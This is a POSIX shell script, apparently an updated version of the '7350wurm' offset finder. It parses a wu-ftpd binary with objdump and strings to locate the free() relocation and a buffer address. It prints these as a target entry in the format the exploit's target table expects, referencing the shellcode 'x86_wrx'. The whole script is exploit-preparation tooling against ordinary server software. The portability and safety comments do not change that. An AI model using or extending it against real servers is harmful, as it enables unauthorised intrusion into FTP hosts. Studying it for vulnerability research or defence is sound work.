#!/bin/sh
# 7350wurm offset finder
# dvorak & scut
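# check_util UTIL...
# Verify that every named utility is on PATH, printing
# "checking for UTIL: /path/to/UTIL" for each one.  Aborts the whole script
# with a non-zero status at the first miss so the objdump/strings pipelines
# below never run against a missing tool.  (The original exited 0 here,
# which let a caller believe the run had succeeded.)
check_util ()
{
  for util in "$@"; do
    # printf: 'echo -n' is not portable under #!/bin/sh (dash prints "-n").
    printf '%s' "checking for $util: "
    # command -v is POSIX and prints the resolved path, like which(1) did;
    # which(1) is not standardised and its exit status varies by platform.
    if ! command -v "$util"; then
      echo "not found, aborting"
      exit 1
    fi
  done
}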
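# Literal newline, kept in a variable so require_one can detect
# multi-line (ambiguous) lookup results.
nl='
'

# die MSG...
# Print MSG to stderr and abort the script with status 1.
die ()
{
  printf '%s\n' "$*" >&2
  exit 1
}

# require_one WHAT VALUE
# Abort unless VALUE is a single non-empty line.  Every value checked here
# is later spliced into a grep pattern or into the emitted C initializer:
# an empty value would make grep match everything (or emit "0x, "), and a
# multi-line value would turn into extra grep arguments.
require_one ()
{
  [ -n "$2" ] || die "could not find $1 in the binary, aborting"
  case "$2" in
    *"$nl"*) die "ambiguous $1, several matches:$nl$2" ;;
  esac
}

# main /path/to/wuftpd/binary
# Locate the free() relocation and the buffer address the exploit needs in
# a wu-ftpd binary and print them as an entry for the exploit's target table.
#
# The binary is the only input and it is untrusted: strings(1) and
# objdump(1) are file parsers, so analyse a binary of unknown origin on a
# copy, inside a throwaway VM or container, not on a machine that matters.
main ()
{
  echo "7350wurm exploit offset finder"
  echo
  if [ "$#" -ne 1 ]; then
    # Usage errors go to stderr and exit non-zero (the original exited 0).
    echo "usage: $0 /path/to/wuftpd/binary" >&2
    echo >&2
    exit 1
  fi
  binary=$1
  [ -r "$binary" ] || die "cannot read $binary"
  check_util strings objdump
  echo

  versionstring=$(strings "$binary" | grep '^Version')
  printf '%s\n' "$versionstring"

  # Dynamic relocation entry for free(); a glob-related entry that also
  # ends in "free" is excluded.
  freeaddr=$(objdump -R "$binary" | grep 'free$' | grep -v glob | awk '{print $1}')
  require_one "free() relocation" "$freeaddr"
  printf '%s\n' "$freeaddr"

  # Leading zeros are stripped so the value matches the address column of
  # the disassembly, which it is grepped against below.
  strncasecmpaddr=$(objdump -T "$binary" | grep strncasecmp | awk '{print $1}' | sed 's/^0*//')
  require_one "strncasecmp dynamic symbol" "$strncasecmpaddr"
  # The 'echo #' lines are the original debug hooks: the '#' comments out
  # the value, so each just prints a blank line.  Drop the '#' to see it.
  echo # $strncasecmpaddr

  # Disassemble once into a temp file instead of three times over the
  # binary; the trap removes it on every exit path, including die.
  disasm=$(mktemp) || die "mktemp failed"
  trap 'rm -f -- "$disasm"' EXIT
  objdump --disassemble "$binary" >"$disasm" 2>/dev/null

  # Address of the instruction carrying a $0xa immediate within the three
  # lines before a reference to the strncasecmp address (presumably the
  # length argument of that call -- this is a heuristic, not a guarantee).
  tmpaddr=$(grep -B3 "$strncasecmpaddr" "$disasm" | grep '\$0xa' | awk '{print $1}' | cut -d ':' -f1)
  require_one "\$0xa immediate near strncasecmp" "$tmpaddr"
  echo # found at $tmpaddr

  # Text after the first '%' on the second instruction following that one,
  # i.e. the register operand (may carry a trailing ',' or ')').
  tmpreg=$(grep -A3 "^ $tmpaddr" "$disasm" | head -3 | tail -1 | cut -d '%' -f2)
  require_one "register operand after $tmpaddr" "$tmpreg"
  echo # $tmpreg

  # First line within the 200 lines before that instruction that mentions
  # the same register together with a $0x80...... immediate; its first
  # nine characters (0x + 7 hex digits) are taken as the buffer address.
  cbufaddr=$(grep -B200 "^ $tmpaddr" "$disasm" | grep "$tmpreg" | grep '\$0x80' \
    | head -1 | cut -d '$' -f2- | cut -c -9)
  require_one "buffer address" "$cbufaddr"

  # Emit one entry in the exploit's target-table format.
  echo "target:"
  echo
  echo '{ "insert exact dist, rpm, .. here",'
  printf '"%s",\n' "$versionstring"
  echo 'x86_wrx, sizeof (x86_wrx) - 1,'
  printf '0x%s, %s },\n' "$freeaddr" "$cbufaddr"
  echo
}

main "$@"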